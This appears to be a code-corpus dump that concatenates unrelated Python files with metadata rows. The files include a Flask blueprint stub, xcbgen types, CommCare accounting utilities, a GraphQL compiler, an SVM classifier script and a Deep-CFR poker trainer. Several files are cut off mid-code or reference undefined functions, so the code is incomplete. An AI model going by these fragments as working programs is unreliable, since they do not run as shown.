bpname = 'issue'
view_permission = f'{bpname}_view'
modify_permission = f'{bpname}_modify'
issue = tblueprint(bpname, __name__)
# issue
# idissue
# idissue
# issue
# issue
# issue
# issue
# issuecomment
# issue-projectid,versionid
# issue
# issue
# idissue
# issuedashboard
# issue
# issue
# pro_idissue
# issue requirement
# issue
| 29.159314 | 114 | 0.504329 |
c787d4b85054cce4a273d4cda061e7e65933333a | 3,351 | py | Python | PhysicsTools/PythonAnalysis/python/ParticleDecayDrawer.py | nistefan/cmssw | ea13af97f7f2117a4f590a5e654e06ecd9825a5b | [
"Apache-2.0"
] | null | null | null | PhysicsTools/PythonAnalysis/python/ParticleDecayDrawer.py | nistefan/cmssw | ea13af97f7f2117a4f590a5e654e06ecd9825a5b | [
"Apache-2.0"
] | null | null | null | PhysicsTools/PythonAnalysis/python/ParticleDecayDrawer.py | nistefan/cmssw | ea13af97f7f2117a4f590a5e654e06ecd9825a5b | [
"Apache-2.0"
] | null | null | null | # Benedikt Hegner, DESY
# benedikt.hegner@cern.ch
#
# this tool is based on Luca Lista's tree drawer module
| 33.848485 | 81 | 0.497165 |
c788076445fbf7d0da81cc5cf12ab9482e59b110 | 357 | py | Python | translator.py | liuprestin/pyninjaTUT-translator | 903642ff56f573ed9c58b6f7db4e6fbb4e722c8d | [
"MIT"
] | null | null | null | translator.py | liuprestin/pyninjaTUT-translator | 903642ff56f573ed9c58b6f7db4e6fbb4e722c8d | [
"MIT"
] | null | null | null | translator.py | liuprestin/pyninjaTUT-translator | 903642ff56f573ed9c58b6f7db4e6fbb4e722c8d | [
"MIT"
] | null | null | null | from translate import Translator
translator = Translator(to_lang="zh")
try:
with open('./example.md', mode='r') as in_file:
text = in_file.read()
with open('./example-tranlated.md', mode='w') as trans_file:
trans_file.write(translator.translate(text))
except FileNotFoundError as e:
print('check your file path') | 27.461538 | 64 | 0.661064 |
c788d246174ead31e98e8d4b7639bcc5eb1a1074 | 580 | py | Python | reddit2telegram/channels/news/app.py | mainyordle/reddit2telegram | 1163e15aed3b6ff0fba65b222d3d9798f644c386 | [
"MIT"
] | 187 | 2016-09-20T09:15:54.000Z | 2022-03-29T12:22:33.000Z | reddit2telegram/channels/news/app.py | mainyordle/reddit2telegram | 1163e15aed3b6ff0fba65b222d3d9798f644c386 | [
"MIT"
] | 84 | 2016-09-22T14:25:07.000Z | 2022-03-19T01:26:17.000Z | reddit2telegram/channels/news/app.py | mainyordle/reddit2telegram | 1163e15aed3b6ff0fba65b222d3d9798f644c386 | [
"MIT"
] | 172 | 2016-09-21T15:39:39.000Z | 2022-03-16T15:15:58.000Z | #encoding:utf-8
from utils import weighted_random_subreddit
t_channel = '@news756'
subreddit = weighted_random_subreddit({
'politics': 0.5,
'news': 0.5
})
| 27.619048 | 75 | 0.653448 |
c78915846f029ced4be55e06e50f81dcf24cc440 | 21,941 | py | Python | xcbgen/xtypes.py | tizenorg/framework.uifw.xorg.xcb.xcb-proto | d5ce7205c9bdd3e28d96d162617e32de1c126f8b | [
"X11"
] | 1 | 2022-03-21T15:39:01.000Z | 2022-03-21T15:39:01.000Z | targetfs/XSGX/lib/python2.6/site-packages/xcbgen/xtypes.py | jhofstee/Graphics_SDK | 805bd44f347ed40699a84979bc9f3e8eb085fd9e | [
"Fair",
"Unlicense"
] | null | null | null | targetfs/XSGX/lib/python2.6/site-packages/xcbgen/xtypes.py | jhofstee/Graphics_SDK | 805bd44f347ed40699a84979bc9f3e8eb085fd9e | [
"Fair",
"Unlicense"
] | null | null | null | '''
This module contains the classes which represent XCB data types.
'''
from xcbgen.expr import Field, Expression
import __main__
# Cardinal datatype globals. See module __init__ method.
tcard8 = SimpleType(('uint8_t',), 1)
tcard16 = SimpleType(('uint16_t',), 2)
tcard32 = SimpleType(('uint32_t',), 4)
tint8 = SimpleType(('int8_t',), 1)
tint16 = SimpleType(('int16_t',), 2)
tint32 = SimpleType(('int32_t',), 4)
tchar = SimpleType(('char',), 1)
tfloat = SimpleType(('float',), 4)
tdouble = SimpleType(('double',), 8)
# for m in self.fields:
# if not m.type.fixed_size():
# return False
# return True
_placeholder_byte = Field(PadType(None), tcard8.name, 'pad0', False, True, False)
| 34.661927 | 112 | 0.593182 |
c78a85d9115e200586e2ed2d790dc6b616c4151d | 3,769 | py | Python | BioKlustering-Website/mlmodel/parser/kmeans.py | solislemuslab/mycovirus-website | bc8d3d5f9a9472c35e40334f19e90bbf782f7a1b | [
"MIT"
] | 1 | 2021-11-23T15:07:58.000Z | 2021-11-23T15:07:58.000Z | BioKlustering-Website/mlmodel/parser/kmeans.py | solislemuslab/mycovirus-website | bc8d3d5f9a9472c35e40334f19e90bbf782f7a1b | [
"MIT"
] | 2 | 2020-10-23T15:40:49.000Z | 2020-10-28T13:21:16.000Z | BioKlustering-Website/mlmodel/parser/kmeans.py | solislemuslab/bioklustering | bc8d3d5f9a9472c35e40334f19e90bbf782f7a1b | [
"MIT"
] | 2 | 2021-11-04T20:01:36.000Z | 2021-11-23T15:13:34.000Z | # Copyright 2020 by Luke Selberg, Solis-Lemus Lab, WID.
# All rights reserved.
# This file is part of the BioKlustering Website.
import pandas as pd
from Bio import SeqIO
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.cluster import KMeans
from sklearn.decomposition import PCA
from sklearn.cluster import MeanShift
from sklearn import preprocessing
import numpy as np
import os
from .helpers import plotly_dash_show_plot
# credit to chunrong
| 37.316832 | 113 | 0.717166 |
c78a9dbe76748ffc4b552241c18002c06e087035 | 1,920 | py | Python | workflow/src/routing.py | mibexsoftware/alfred-stash-workflow | 5cdba4d14c8998b937c1aa6af8e3417251fac540 | [
"MIT"
] | 13 | 2016-03-31T16:19:59.000Z | 2019-09-26T20:47:57.000Z | workflow/src/routing.py | mibexsoftware/alfred-stash-workflow | 5cdba4d14c8998b937c1aa6af8e3417251fac540 | [
"MIT"
] | 6 | 2015-09-18T15:24:43.000Z | 2019-10-23T16:51:39.000Z | workflow/src/routing.py | mibexsoftware/alfred-stash-workflow | 5cdba4d14c8998b937c1aa6af8e3417251fac540 | [
"MIT"
] | 3 | 2015-09-16T18:05:32.000Z | 2020-01-04T19:41:21.000Z | # -*- coding: utf-8 -*-
from src import icons, __version__
from src.actions import HOST_URL
from src.actions.configure import ConfigureWorkflowAction
from src.actions.help import HelpWorkflowAction
from src.actions.index import IndexWorkflowAction
from src.actions.projects import ProjectWorkflowAction
from src.actions.pull_requests import PullRequestWorkflowAction
from src.actions.repositories import RepositoryWorkflowAction
from src.util import workflow, call_alfred
WORKFLOW_ACTIONS = {
':config': ConfigureWorkflowAction,
':projects': ProjectWorkflowAction,
':repos': RepositoryWorkflowAction,
':pullrequests': PullRequestWorkflowAction,
':help': HelpWorkflowAction
}
| 39.183673 | 105 | 0.678125 |
c78c8acd4546ee0e8cf65b0df48d4a928c3e7481 | 1,262 | py | Python | model/model.py | CaoHoangTung/shark-cop-server | 38cb494d45297b723b4ef6bf82b8c9e53c2993a0 | [
"MIT"
] | 2 | 2020-10-02T03:01:32.000Z | 2020-12-06T09:21:06.000Z | model/model.py | CaoHoangTung/shark-cop-server | 38cb494d45297b723b4ef6bf82b8c9e53c2993a0 | [
"MIT"
] | null | null | null | model/model.py | CaoHoangTung/shark-cop-server | 38cb494d45297b723b4ef6bf82b8c9e53c2993a0 | [
"MIT"
] | null | null | null | import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from sklearn.model_selection import train_test_split
from sklearn.svm import SVC
from sklearn.metrics import classification_report, confusion_matrix
from mlxtend.plotting import plot_decision_regions
# from sklearn import datasets
from pandas.plotting import scatter_matrix
from joblib import dump, load
import collections
kaggle_data = pd.read_csv('data/kaggle.csv')
data = pd.read_csv('data/new_data.csv')
kaggle_X = kaggle_data.iloc[:, :30].values
X = data.drop(['index'],axis=1).iloc[:, :30].values
y = data.iloc[:,-1].values
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.99)
kaggle_X_train, kaggle_X_test, kaggle_y_train, kaggle_y_test = train_test_split(X, y, test_size = 0.02)
svclassifier = SVC(kernel='poly',degree=5)
svclassifier.fit(kaggle_X_train, kaggle_y_train)
dump(svclassifier, 'pre_model.joblib')
y_pred = svclassifier.predict(X_test)
print(confusion_matrix(y_test,y_pred))
print(classification_report(y_test,y_pred))
# print("X=%s, Predicted=%s" % (test_2d, y_pred_test[0]))
# print(y_pred.shape)
# TESTING ZONE
X = [[-1,1,0,-1,-1,-1,1,0,-1,1,1,-1,0,0,-1,-1,-1,-1,0,1,0,0,0,-1,1,1,1,1,-1,-1]]
print("PREDICTION:",svclassifier.predict(X))
| 33.210526 | 103 | 0.759113 |
c78d0f81c7f3ce50a968bb140ed1caaa45e4bf4b | 547 | py | Python | PE032.py | CaptainSora/Python-Project-Euler | 056400f434eec837ece5ef06653b310ebfcc3d4e | [
"MIT"
] | null | null | null | PE032.py | CaptainSora/Python-Project-Euler | 056400f434eec837ece5ef06653b310ebfcc3d4e | [
"MIT"
] | null | null | null | PE032.py | CaptainSora/Python-Project-Euler | 056400f434eec837ece5ef06653b310ebfcc3d4e | [
"MIT"
] | null | null | null | from itertools import count
from _pandigital_tools import is_pandigital
def pand_products():
"""
Returns the sum of all numbers n which have a factorization a * b = n such
that a, b, n are (cumulatively) 1 through 9 pandigital.
"""
total = set()
for a in range(2, 100):
for b in count(a):
if len(str(a) + str(b) + str(a * b)) > 9:
break
elif is_pandigital(a, b, a * b):
total.add(a * b)
return sum(total)
| 23.782609 | 78 | 0.570384 |
c78d62ba8abdde61ef2fb89e7ca95a09bbcfc5d2 | 282 | py | Python | v1/models.py | jdubansky/openstates.org | 6fd5592aae554c4bb201f0a76ed3605bff5204c2 | [
"MIT"
] | 1 | 2022-01-17T11:54:28.000Z | 2022-01-17T11:54:28.000Z | v1/models.py | washabstract/openstates.org | dc541ae5cd09dd3b3db623178bf32a03d0246f01 | [
"MIT"
] | null | null | null | v1/models.py | washabstract/openstates.org | dc541ae5cd09dd3b3db623178bf32a03d0246f01 | [
"MIT"
] | null | null | null | from django.db import models
from openstates.data.models import Bill
| 28.2 | 69 | 0.758865 |
c78e2f38914cd69e3bd290dd0efeba4071626991 | 14,594 | py | Python | corehq/apps/accounting/utils.py | satyaakam/commcare-hq | 233f255ff20ab3a16013e9fdfdb9c1dcf632e415 | [
"BSD-3-Clause"
] | null | null | null | corehq/apps/accounting/utils.py | satyaakam/commcare-hq | 233f255ff20ab3a16013e9fdfdb9c1dcf632e415 | [
"BSD-3-Clause"
] | 1 | 2021-06-02T04:45:16.000Z | 2021-06-02T04:45:16.000Z | corehq/apps/accounting/utils.py | satyaakam/commcare-hq | 233f255ff20ab3a16013e9fdfdb9c1dcf632e415 | [
"BSD-3-Clause"
] | null | null | null | import datetime
import logging
from collections import defaultdict, namedtuple
from django.conf import settings
from django.template.loader import render_to_string
from django.urls import reverse
from django.utils.translation import ugettext_lazy as _
from django_prbac.models import Grant, Role, UserRole
from corehq.const import USER_DATE_FORMAT
from dimagi.utils.couch.database import iter_docs
from dimagi.utils.dates import add_months
from corehq import privileges
from corehq.apps.accounting.exceptions import (
AccountingError,
ProductPlanNotFoundError,
)
from corehq.apps.domain.models import Domain
from corehq.util.quickcache import quickcache
from corehq.util.view_utils import absolute_reverse
logger = logging.getLogger('accounting')
EXCHANGE_RATE_DECIMAL_PLACES = 9
def fmt_feature_rate_dict(feature, feature_rate=None):
"""
This will be turned into a JSON representation of this Feature and its FeatureRate
"""
if feature_rate is None:
feature_rate = feature.get_rate()
return {
'name': feature.name,
'feature_type': feature.feature_type,
'feature_id': feature.id,
'rate_id': feature_rate.id,
'monthly_fee': str(feature_rate.monthly_fee),
'monthly_limit': feature_rate.monthly_limit,
'per_excess_fee': str(feature_rate.per_excess_fee),
}
def fmt_product_rate_dict(product_name, product_rate=None):
"""
This will be turned into a JSON representation of this SoftwareProductRate
"""
from corehq.apps.accounting.models import SoftwareProductRate
if product_rate is None:
try:
product_rate = SoftwareProductRate.objects.filter(
is_active=True,
name=product_name,
).latest('date_created')
except SoftwareProductRate.DoesNotExist:
product_rate = SoftwareProductRate.objects.create(name=product_name, is_active=True)
return {
'name': product_rate.name,
'rate_id': product_rate.id,
'monthly_fee': str(product_rate.monthly_fee),
}
ChangeStatusResult = namedtuple('ChangeStatusResult', ['adjustment_reason', 'downgraded_privs', 'upgraded_privs'])
def is_active_subscription(date_start, date_end, today=None):
today = today or datetime.date.today()
return ((date_start is None or date_start <= today)
and (date_end is None or today < date_end))
def has_subscription_already_ended(subscription):
return (subscription.date_end is not None
and subscription.date_end <= datetime.date.today())
def get_money_str(amount):
if amount is not None:
if amount < 0:
fmt = "-$%0.2f"
amount = abs(amount)
else:
fmt = "$%0.2f"
return fmt % amount
return ""
def get_address_from_invoice(invoice):
from corehq.apps.accounting.invoice_pdf import Address
from corehq.apps.accounting.models import BillingContactInfo
try:
contact_info = BillingContactInfo.objects.get(
account=invoice.account,
)
return Address(
name=(
"%s %s" %
(contact_info.first_name
if contact_info.first_name is not None else "",
contact_info.last_name
if contact_info.last_name is not None else "")
),
company_name=contact_info.company_name,
first_line=contact_info.first_line,
second_line=contact_info.second_line,
city=contact_info.city,
region=contact_info.state_province_region,
postal_code=contact_info.postal_code,
country=contact_info.country,
)
except BillingContactInfo.DoesNotExist:
return Address()
def get_dimagi_from_email():
return ("Dimagi CommCare Accounts <%(email)s>" % {
'email': settings.INVOICING_CONTACT_EMAIL,
})
def ensure_grants(grants_to_privs, dry_run=False, verbose=False, roles_by_slug=None):
"""
Adds a parameterless grant between grantee and priv, looked up by slug.
:param grants_to_privs: An iterable of two-tuples:
`(grantee_slug, priv_slugs)`. Will only be iterated once.
"""
dry_run_tag = "[DRY RUN] " if dry_run else ""
if roles_by_slug is None:
roles_by_slug = {role.slug: role for role in Role.objects.all()}
granted = defaultdict(set)
for grant in Grant.objects.select_related('from_role', 'to_role').all():
granted[grant.from_role.slug].add(grant.to_role.slug)
grants_to_create = []
for grantee_slug, priv_slugs in grants_to_privs:
if grantee_slug not in roles_by_slug:
logger.info('grantee %s does not exist.', grantee_slug)
continue
for priv_slug in priv_slugs:
if priv_slug not in roles_by_slug:
logger.info('privilege %s does not exist.', priv_slug)
continue
if priv_slug in granted[grantee_slug]:
if verbose or dry_run:
logger.info('%sPrivilege already granted: %s => %s',
dry_run_tag, grantee_slug, priv_slug)
else:
granted[grantee_slug].add(priv_slug)
if verbose or dry_run:
logger.info('%sGranting privilege: %s => %s',
dry_run_tag, grantee_slug, priv_slug)
if not dry_run:
grants_to_create.append(Grant(
from_role=roles_by_slug[grantee_slug],
to_role=roles_by_slug[priv_slug]
))
if grants_to_create:
Role.get_cache().clear()
Grant.objects.bulk_create(grants_to_create)
| 34.419811 | 114 | 0.688434 |
c790959983852e5ff5dc7391f5d9c3bf229bac12 | 435 | py | Python | hci/command/commands/le_apcf_commands/apcf_service_data.py | cc4728/python-hci | d988f69c55972af445ec3ba04fd4cd1199593d10 | [
"MIT"
] | 3 | 2021-12-16T14:32:45.000Z | 2022-01-25T03:10:48.000Z | hci/command/commands/le_apcf_commands/apcf_service_data.py | cc4728/python-hci | d988f69c55972af445ec3ba04fd4cd1199593d10 | [
"MIT"
] | null | null | null | hci/command/commands/le_apcf_commands/apcf_service_data.py | cc4728/python-hci | d988f69c55972af445ec3ba04fd4cd1199593d10 | [
"MIT"
] | 1 | 2022-01-25T03:10:50.000Z | 2022-01-25T03:10:50.000Z | from ..le_apcf_command_pkt import LE_APCF_Command
from struct import pack, unpack
from enum import IntEnum
"""
This pare base on spec <<Android BT HCI Requirement for BLE feature>> v0.52
Advertisement Package Content filter
"""
| 25.588235 | 75 | 0.698851 |
c790fdff7571a6a4a1222a967671954a3b60828b | 1,468 | py | Python | source/documentModel/representations/DocumentNGramSymWinGraph.py | Vyvy-vi/Ngram-Graphs | 3b990e5fd92543f7152b4a2c8e689e771578c047 | [
"Apache-2.0"
] | 178 | 2016-09-21T19:51:28.000Z | 2021-09-07T17:37:06.000Z | source/documentModel/representations/DocumentNGramSymWinGraph.py | Vyvy-vi/Ngram-Graphs | 3b990e5fd92543f7152b4a2c8e689e771578c047 | [
"Apache-2.0"
] | null | null | null | source/documentModel/representations/DocumentNGramSymWinGraph.py | Vyvy-vi/Ngram-Graphs | 3b990e5fd92543f7152b4a2c8e689e771578c047 | [
"Apache-2.0"
] | 17 | 2016-10-21T02:11:13.000Z | 2020-10-07T19:11:54.000Z | """
DocumentNGramSymWinGraph.py
Created on May 23, 2017, 4:56 PM
"""
import networkx as nx
import pygraphviz as pgv
import matplotlib.pyplot as plt
from networkx.drawing.nx_agraph import graphviz_layout
from DocumentNGramGraph import DocumentNGramGraph
| 26.690909 | 55 | 0.52248 |
c791642581cbd1a8e05d99ab1f306e65029dc666 | 2,212 | py | Python | examples/EC2Conditions.py | DrLuke/troposphere | 05672a2b0cf87215dbd6a2a656669e0d3c92d0e5 | [
"BSD-2-Clause"
] | 1 | 2021-04-03T22:24:36.000Z | 2021-04-03T22:24:36.000Z | examples/EC2Conditions.py | cartermeyers/troposphere | 4b42fa0d65f73cec28184b5349aa198fb8ee5b2e | [
"BSD-2-Clause"
] | 1 | 2021-06-25T15:20:46.000Z | 2021-06-25T15:20:46.000Z | examples/EC2Conditions.py | cartermeyers/troposphere | 4b42fa0d65f73cec28184b5349aa198fb8ee5b2e | [
"BSD-2-Clause"
] | 5 | 2020-05-10T13:50:32.000Z | 2021-09-09T09:06:54.000Z | from __future__ import print_function
from troposphere import (
Template, Parameter, Ref, Condition, Equals, And, Or, Not, If
)
from troposphere import ec2
parameters = {
"One": Parameter(
"One",
Type="String",
),
"Two": Parameter(
"Two",
Type="String",
),
"Three": Parameter(
"Three",
Type="String",
),
"Four": Parameter(
"Four",
Type="String",
),
"SshKeyName": Parameter(
"SshKeyName",
Type="String",
)
}
conditions = {
"OneEqualsFoo": Equals(
Ref("One"),
"Foo"
),
"NotOneEqualsFoo": Not(
Condition("OneEqualsFoo")
),
"BarEqualsTwo": Equals(
"Bar",
Ref("Two")
),
"ThreeEqualsFour": Equals(
Ref("Three"),
Ref("Four")
),
"OneEqualsFooOrBarEqualsTwo": Or(
Condition("OneEqualsFoo"),
Condition("BarEqualsTwo")
),
"OneEqualsFooAndNotBarEqualsTwo": And(
Condition("OneEqualsFoo"),
Not(Condition("BarEqualsTwo"))
),
"OneEqualsFooAndBarEqualsTwoAndThreeEqualsPft": And(
Condition("OneEqualsFoo"),
Condition("BarEqualsTwo"),
Equals(Ref("Three"), "Pft")
),
"OneIsQuzAndThreeEqualsFour": And(
Equals(Ref("One"), "Quz"),
Condition("ThreeEqualsFour")
),
"LaunchInstance": And(
Condition("OneEqualsFoo"),
Condition("NotOneEqualsFoo"),
Condition("BarEqualsTwo"),
Condition("OneEqualsFooAndNotBarEqualsTwo"),
Condition("OneIsQuzAndThreeEqualsFour")
),
"LaunchWithGusto": And(
Condition("LaunchInstance"),
Equals(Ref("One"), "Gusto")
)
}
resources = {
"Ec2Instance": ec2.Instance(
"Ec2Instance",
Condition="LaunchInstance",
ImageId=If("ConditionNameEqualsFoo", "ami-12345678", "ami-87654321"),
InstanceType="t1.micro",
KeyName=Ref("SshKeyName"),
SecurityGroups=["default"],
)
}
t = Template()
for p in parameters.values():
t.add_parameter(p)
for k in conditions:
t.add_condition(k, conditions[k])
for r in resources.values():
t.add_resource(r)
print(t.to_json())
| 22.343434 | 77 | 0.573689 |
c79252ab386af5d00249bc02769ec35279e30201 | 768 | py | Python | fist_phase/08_objects.py | kapuni/exercise_py | b60ba8462d2545cae57483bcb0b3428b03c5d522 | [
"MIT"
] | null | null | null | fist_phase/08_objects.py | kapuni/exercise_py | b60ba8462d2545cae57483bcb0b3428b03c5d522 | [
"MIT"
] | null | null | null | fist_phase/08_objects.py | kapuni/exercise_py | b60ba8462d2545cae57483bcb0b3428b03c5d522 | [
"MIT"
] | null | null | null |
if __name__ == '__main__':
main() | 23.272727 | 53 | 0.605469 |
c79307bf6012742aa0a7a562893d0160e400a873 | 1,108 | py | Python | lrtc_lib/data/load_dataset.py | MovestaDev/low-resource-text-classification-framework | 4380755a65b35265e84ecbf4b87e872d79e8f079 | [
"Apache-2.0"
] | 57 | 2020-11-18T15:13:06.000Z | 2022-03-28T22:33:26.000Z | lrtc_lib/data/load_dataset.py | MovestaDev/low-resource-text-classification-framework | 4380755a65b35265e84ecbf4b87e872d79e8f079 | [
"Apache-2.0"
] | 5 | 2021-02-23T22:11:07.000Z | 2021-12-13T00:13:48.000Z | lrtc_lib/data/load_dataset.py | MovestaDev/low-resource-text-classification-framework | 4380755a65b35265e84ecbf4b87e872d79e8f079 | [
"Apache-2.0"
] | 14 | 2021-02-10T08:55:27.000Z | 2022-02-23T22:37:54.000Z | # (c) Copyright IBM Corporation 2020.
# LICENSE: Apache License 2.0 (Apache-2.0)
# http://www.apache.org/licenses/LICENSE-2.0
import logging
from lrtc_lib.data_access import single_dataset_loader
from lrtc_lib.data_access.processors.dataset_part import DatasetPart
from lrtc_lib.oracle_data_access import gold_labels_loader
logging.basicConfig(level=logging.INFO, format='%(asctime)s %(levelname)-8s [%(filename)s:%(lineno)d] %(message)s')
if __name__ == '__main__':
dataset_name = 'polarity'
load(dataset=dataset_name) | 35.741935 | 115 | 0.730144 |
c79467938af160abb2d49f1add583ea15a8cc080 | 8,019 | py | Python | graphql_compiler/compiler/emit_match.py | BarracudaPff/code-golf-data-pythpn | 42e8858c2ebc6a061012bcadb167d29cebb85c5e | [
"MIT"
] | null | null | null | graphql_compiler/compiler/emit_match.py | BarracudaPff/code-golf-data-pythpn | 42e8858c2ebc6a061012bcadb167d29cebb85c5e | [
"MIT"
] | null | null | null | graphql_compiler/compiler/emit_match.py | BarracudaPff/code-golf-data-pythpn | 42e8858c2ebc6a061012bcadb167d29cebb85c5e | [
"MIT"
] | null | null | null | """Convert lowered IR basic blocks to MATCH query strings."""
from collections import deque
import six
from .blocks import Filter, MarkLocation, QueryRoot, Recurse, Traverse
from .expressions import TrueLiteral
from .helpers import get_only_element_from_collection, validate_safe_string
def _get_vertex_location_name(location):
"""Get the location name from a location that is expected to point to a vertex."""
mark_name, field_name = location.get_location_name()
if field_name is not None:
raise AssertionError(u"Location unexpectedly pointed to a field: {}".format(location))
return mark_name
def _first_step_to_match(match_step):
"""Transform the very first MATCH step into a MATCH query string."""
parts = []
if match_step.root_block is not None:
if not isinstance(match_step.root_block, QueryRoot):
raise AssertionError(u"Expected None or QueryRoot root block, received: " u"{} {}".format(match_step.root_block, match_step))
match_step.root_block.validate()
start_class = get_only_element_from_collection(match_step.root_block.start_class)
parts.append(u"class: %s" % (start_class,))
if match_step.coerce_type_block is not None:
raise AssertionError(u"Invalid MATCH step: {}".format(match_step))
if match_step.where_block:
match_step.where_block.validate()
parts.append(u"where: (%s)" % (match_step.where_block.predicate.to_match(),))
if match_step.as_block is None:
raise AssertionError(u"Found a MATCH step without a corresponding Location. " u"This should never happen: {}".format(match_step))
else:
match_step.as_block.validate()
parts.append(u"as: %s" % (_get_vertex_location_name(match_step.as_block.location),))
return u"{{ %s }}" % (u", ".join(parts),)
def _subsequent_step_to_match(match_step):
"""Transform any subsequent (non-first) MATCH step into a MATCH query string."""
if not isinstance(match_step.root_block, (Traverse, Recurse)):
raise AssertionError(u"Expected Traverse root block, received: " u"{} {}".format(match_step.root_block, match_step))
is_recursing = isinstance(match_step.root_block, Recurse)
match_step.root_block.validate()
traversal_command = u".%s('%s')" % (match_step.root_block.direction, match_step.root_block.edge_name)
parts = []
if match_step.coerce_type_block:
coerce_type_set = match_step.coerce_type_block.target_class
if len(coerce_type_set) != 1:
raise AssertionError(u"Found MATCH type coercion block with more than one target class:" u" {} {}".format(coerce_type_set, match_step))
coerce_type_target = list(coerce_type_set)[0]
parts.append(u"class: %s" % (coerce_type_target,))
if is_recursing:
parts.append(u"while: ($depth < %d)" % (match_step.root_block.depth,))
if match_step.where_block:
match_step.where_block.validate()
parts.append(u"where: (%s)" % (match_step.where_block.predicate.to_match(),))
if not is_recursing and match_step.root_block.optional:
parts.append(u"optional: true")
if match_step.as_block:
match_step.as_block.validate()
parts.append(u"as: %s" % (_get_vertex_location_name(match_step.as_block.location),))
return u"%s {{ %s }}" % (traversal_command, u", ".join(parts))
def _represent_match_traversal(match_traversal):
"""Emit MATCH query code for an entire MATCH traversal sequence."""
output = []
output.append(_first_step_to_match(match_traversal[0]))
for step in match_traversal[1:]:
output.append(_subsequent_step_to_match(step))
return u"".join(output)
def _represent_fold(fold_location, fold_ir_blocks):
"""Emit a LET clause corresponding to the IR blocks for a @fold scope."""
start_let_template = u"$%(mark_name)s = %(base_location)s"
traverse_edge_template = u'.%(direction)s("%(edge_name)s")'
base_template = start_let_template + traverse_edge_template
edge_direction, edge_name = fold_location.get_first_folded_edge()
mark_name, _ = fold_location.get_location_name()
base_location_name, _ = fold_location.base_location.get_location_name()
validate_safe_string(mark_name)
validate_safe_string(base_location_name)
validate_safe_string(edge_direction)
validate_safe_string(edge_name)
template_data = {"mark_name": mark_name, "base_location": base_location_name, "direction": edge_direction, "edge_name": edge_name}
final_string = base_template % template_data
for block in fold_ir_blocks:
if isinstance(block, Filter):
final_string += u"[" + block.predicate.to_match() + u"]"
elif isinstance(block, Traverse):
template_data = {"direction": block.direction, "edge_name": block.edge_name}
final_string += traverse_edge_template % template_data
elif isinstance(block, MarkLocation):
pass
else:
raise AssertionError(u"Found an unexpected IR block in the folded IR blocks: " u"{} {} {}".format(type(block), block, fold_ir_blocks))
final_string += ".asList()"
return final_string
def _construct_output_to_match(output_block):
"""Transform a ConstructResult block into a MATCH query string."""
output_block.validate()
selections = (u"%s AS `%s`" % (output_block.fields[key].to_match(), key) for key in sorted(output_block.fields.keys()))
return u"SELECT %s FROM" % (u", ".join(selections),)
def _construct_where_to_match(where_block):
"""Transform a Filter block into a MATCH query string."""
if where_block.predicate == TrueLiteral:
raise AssertionError(u"Received WHERE block with TrueLiteral predicate: {}".format(where_block))
return u"WHERE " + where_block.predicate.to_match()
def emit_code_from_single_match_query(match_query):
"""Return a MATCH query string from a list of IR blocks."""
query_data = deque([u"MATCH "])
if not match_query.match_traversals:
raise AssertionError(u"Unexpected falsy value for match_query.match_traversals received: " u"{} {}".format(match_query.match_traversals, match_query))
match_traversal_data = [_represent_match_traversal(x) for x in match_query.match_traversals]
query_data.append(match_traversal_data[0])
for traversal_data in match_traversal_data[1:]:
query_data.append(u", ")
query_data.append(traversal_data)
query_data.appendleft(u" (")
query_data.append(u"RETURN $matches)")
fold_data = sorted([_represent_fold(fold_location, fold_ir_blocks) for fold_location, fold_ir_blocks in six.iteritems(match_query.folds)])
if fold_data:
query_data.append(u" LET ")
query_data.append(fold_data[0])
for fold_clause in fold_data[1:]:
query_data.append(u", ")
query_data.append(fold_clause)
query_data.appendleft(_construct_output_to_match(match_query.output_block))
if match_query.where_block is not None:
query_data.append(_construct_where_to_match(match_query.where_block))
return u" ".join(query_data)
def emit_code_from_multiple_match_queries(match_queries):
"""Return a MATCH query string from a list of MatchQuery namedtuples."""
optional_variable_base_name = "$optional__"
union_variable_name = "$result"
query_data = deque([u"SELECT EXPAND(", union_variable_name, u")", u" LET "])
optional_variables = []
sub_queries = [emit_code_from_single_match_query(match_query) for match_query in match_queries]
for (i, sub_query) in enumerate(sub_queries):
variable_name = optional_variable_base_name + str(i)
variable_assignment = variable_name + u" = ("
sub_query_end = u"),"
query_data.append(variable_assignment)
query_data.append(sub_query)
query_data.append(sub_query_end)
optional_variables.append(variable_name)
query_data.append(union_variable_name)
query_data.append(u" = UNIONALL(")
query_data.append(u", ".join(optional_variables))
query_data.append(u")")
return u" ".join(query_data)
def emit_code_from_ir(schema_info, compound_match_query):
"""Return a MATCH query string from a CompoundMatchQuery."""
match_queries = compound_match_query.match_queries
if len(match_queries) == 1:
query_string = emit_code_from_single_match_query(match_queries[0])
elif len(match_queries) > 1:
query_string = emit_code_from_multiple_match_queries(match_queries)
else:
raise AssertionError(u"Received CompoundMatchQuery with an empty list of MatchQueries: " u"{}".format(match_queries))
return query_string | 52.411765 | 152 | 0.775907 |
c794ff339d897246d1f9ee7d50c25c7781c1ee06 | 3,286 | py | Python | mo_leduc.py | mohamedun/Deep-CFR | ec3a7fb06e11bd6cc65bb2bf6f16108ee41f7234 | [
"MIT"
] | null | null | null | mo_leduc.py | mohamedun/Deep-CFR | ec3a7fb06e11bd6cc65bb2bf6f16108ee41f7234 | [
"MIT"
] | null | null | null | mo_leduc.py | mohamedun/Deep-CFR | ec3a7fb06e11bd6cc65bb2bf6f16108ee41f7234 | [
"MIT"
] | null | null | null | from PokerRL.game.games import StandardLeduc
from PokerRL.game.games import BigLeduc
from PokerRL.eval.rl_br.RLBRArgs import RLBRArgs
from PokerRL.eval.lbr.LBRArgs import LBRArgs
from PokerRL.game.bet_sets import POT_ONLY
from DeepCFR.EvalAgentDeepCFR import EvalAgentDeepCFR
from DeepCFR.TrainingProfile import TrainingProfile
from DeepCFR.workers.driver.Driver import Driver
import pdb
if __name__ == '__main__':
ctrl = Driver(t_prof=TrainingProfile(name="MO_LEDUC_BigLeduc_LBR",
nn_type="feedforward",
eval_agent_export_freq=3,
checkpoint_freq=3,
n_learner_actor_workers=5,
max_buffer_size_adv=1e6,
n_traversals_per_iter=500,
n_batches_adv_training=250,
mini_batch_size_adv=2048,
game_cls=BigLeduc,
n_units_final_adv=64,
n_merge_and_table_layer_units_adv=64,
init_adv_model="random", # warm start neural weights with init from last iter
use_pre_layers_adv=False, # shallower nets
use_pre_layers_avrg=False, # shallower nets
# You can specify one or both modes. Choosing both is useful to compare them.
eval_modes_of_algo=(
EvalAgentDeepCFR.EVAL_MODE_SINGLE, # SD-CFR
),
